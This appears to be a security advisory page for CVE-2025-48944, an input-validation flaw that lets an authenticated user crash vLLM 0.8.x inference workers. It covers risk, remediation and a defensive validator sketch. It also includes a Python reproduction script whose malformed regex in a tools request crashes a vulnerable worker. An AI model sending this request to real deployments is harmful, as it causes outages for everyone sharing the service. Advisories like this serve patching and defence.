CVE-2025-48944: vLLM: input validation DoS crashes inference worker
GHSA-vrq3-r879-7m65 · MEDIUM · PoC AVAILABLE · CISA SSVC: Track
Any authenticated API user can crash a vLLM inference worker with a single malformed tools request, causing a service outage until the worker is manually restarted. The low-privilege access requirement makes this a realistic insider or compromised-credential threat in multi-tenant LLM deployments. Patch to vLLM 0.9.0 immediately; there is no safe workaround short of disabling tools functionality entirely.
Risk Assessment
Medium-high operational risk despite the CVSS 6.5 score. Attack complexity is low and only low-privilege API credentials are required, making exploitation trivial for any user with API access. The impact is total disruption of the affected inference worker with no automatic recovery—manual intervention required each time. Organizations running vLLM 0.8.x with the tools API exposed face persistent availability risk from any authenticated principal, internal or external.
Affected Systems
vLLM versions 0.8.0 up to but excluding 0.9.0 with the /v1/chat/completions tools functionality enabled. Fixed in 0.9.0.
Severity & Risk
CVSS v3.1 base score 6.5 (MEDIUM); EPSS exploitation probability 0.32%; public proof-of-concept available.
Attack Surface
The 'pattern' and 'type' fields of tool definitions submitted to /v1/chat/completions by any authenticated, low-privilege API user.
Recommended Action
1) Upgrade vLLM to 0.9.0 immediately; this is the only complete fix.
2) If patching is blocked, restrict /v1/chat/completions tools functionality to trusted internal principals at the API gateway level, or disable it entirely.
3) Implement automatic worker restart via systemd watchdog, Kubernetes liveness probes, or equivalent to minimize MTTR if exploitation occurs.
4) Add API gateway or WAF rules to validate and reject structurally malformed 'pattern' and 'type' fields in tool definitions before they reach the inference worker (see the sketch after this list).
5) Alert on unexpected vLLM worker process terminations; treat crashes as potential exploitation indicators.
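A minimal pre-validation sketch for step 4, in Python. It assumes the OpenAI-compatible tools schema this advisory describes; the function names and the schema walk are illustrative, not vLLM's actual implementation, and Python's re dialect is only a coarse stand-in for the ECMA-262 regex dialect JSON Schema specifies.

```python
# Illustrative gateway-side check: reject tool definitions whose 'type' or
# 'pattern' fields would not survive a compile/parse step downstream.
# validate_tools and _walk_schema are hypothetical helper names.
import re

ALLOWED_TYPES = {"object", "string", "number", "integer", "boolean", "array", "null"}

def validate_tools(payload: dict) -> list[str]:
    """Return validation errors for the 'tools' array of a chat request."""
    errors: list[str] = []
    for i, tool in enumerate(payload.get("tools", [])):
        params = tool.get("function", {}).get("parameters", {})
        _walk_schema(params, f"tools[{i}]", errors)
    return errors

def _walk_schema(node, path: str, errors: list[str]) -> None:
    if not isinstance(node, dict):
        return
    t = node.get("type")
    if t is not None and not (isinstance(t, str) and t in ALLOWED_TYPES):
        errors.append(f"{path}: invalid 'type' value {t!r}")
    pattern = node.get("pattern")
    if pattern is not None:
        if not isinstance(pattern, str):
            errors.append(f"{path}: 'pattern' must be a string")
        else:
            try:
                re.compile(pattern)  # reject patterns that will not compile
            except re.error as exc:
                errors.append(f"{path}: unparseable 'pattern' ({exc})")
    # Recurse into nested schema objects (properties, items, etc.).
    for key, child in node.items():
        if isinstance(child, dict):
            _walk_schema(child, f"{path}.{key}", errors)
        elif isinstance(child, list):
            for j, item in enumerate(child):
                _walk_schema(item, f"{path}.{key}[{j}]", errors)
```

A gateway integrating this check should return HTTP 400 whenever validate_tools reports errors instead of forwarding the request to the worker; this is defense in depth, not a substitute for upgrading to 0.9.0.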
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision: Track, per the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-48944?
CVE-2025-48944 is an input-validation flaw in vLLM 0.8.x, fixed in 0.9.0: any authenticated API user can crash an inference worker with a single malformed tools request, causing a service outage until the worker is manually restarted. The low-privilege access requirement makes this a realistic insider or compromised-credential threat in multi-tenant LLM deployments.
Is CVE-2025-48944 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-48944, increasing the risk of exploitation.
How to fix CVE-2025-48944?
Upgrade vLLM to 0.9.0; this is the only complete fix. If patching is blocked, restrict or disable the /v1/chat/completions tools functionality at the API gateway, validate 'pattern' and 'type' fields in tool definitions before they reach the inference worker, configure automatic worker restarts (systemd watchdog, Kubernetes liveness probes, or equivalent), and alert on unexpected worker terminations. See Recommended Action above for the full step list.
What systems are affected by CVE-2025-48944?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, function-calling pipelines, model serving APIs, RAG pipelines with tool use.
What is the CVSS score for CVE-2025-48944?
CVE-2025-48944 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.32%.
Technical Details
NVD Description
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
Exploitation Scenario
An attacker with basic API credentials—or a compromised low-privilege service account—sends a single POST request to /v1/chat/completions with a crafted 'tools' array containing a malformed 'pattern' field (e.g., an invalid regex that fails to compile) or a structurally invalid 'type' annotation. The vLLM backend attempts to compile or parse this input without prior validation, triggering an unhandled exception that terminates the inference worker process. The LLM service is fully unavailable until an operator manually restarts the worker. In a shared or multi-tenant LLM platform, a single request denies service to all downstream users of that worker. The attack requires no AI/ML expertise—only knowledge of the OpenAI-compatible tools API schema.
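A reproduction sketch of this request shape, in Python, for testing a staging deployment you own. BASE_URL, API_KEY, and the model name are placeholders; the uncompilable regex in 'pattern' illustrates the class of malformed input the advisory describes, not a confirmed exploit payload.

```python
# Defensive testing only: send one tools request with an invalid 'pattern'
# to a staging vLLM 0.8.x instance and observe whether the worker survives.
import requests

BASE_URL = "http://localhost:8000"  # placeholder: your staging vLLM endpoint
API_KEY = "sk-test"                 # placeholder credential

payload = {
    "model": "my-model",  # placeholder model name
    "messages": [{"role": "user", "content": "hi"}],
    "tools": [{
        "type": "function",
        "function": {
            "name": "lookup",
            "parameters": {
                "type": "object",
                "properties": {
                    # "[" cannot compile as a regex; per the advisory, the
                    # unvalidated field reaches a compile/parse step and the
                    # resulting unhandled exception terminates the worker.
                    "query": {"type": "string", "pattern": "["},
                },
            },
        },
    }],
}

resp = requests.post(
    f"{BASE_URL}/v1/chat/completions",
    headers={"Authorization": f"Bearer {API_KEY}"},
    json=payload,
    timeout=30,
)
print(resp.status_code, resp.text[:200])
```

On a patched 0.9.0 instance the request should be rejected cleanly; on a vulnerable 0.8.x worker, subsequent requests will fail until the process is restarted.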
Weaknesses (CWE)
CWE-20: Improper Input Validation
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H (network vector, low attack complexity, low privileges, no user interaction, availability impact only)
Related Vulnerabilities (same package: vllm)
CVE-2024-9053 (9.8) vllm: RCE via unsafe pickle deserialization in RPC server
CVE-2024-11041 (9.8) vllm: RCE via unsafe pickle deserialization in MessageQueue
CVE-2026-25960 (9.8) vllm: SSRF allows internal network access
CVE-2025-47277 (9.8) vLLM: RCE via exposed TCPStore in distributed inference
CVE-2025-32444 (9.8) vLLM: RCE via pickle deserialization on ZeroMQ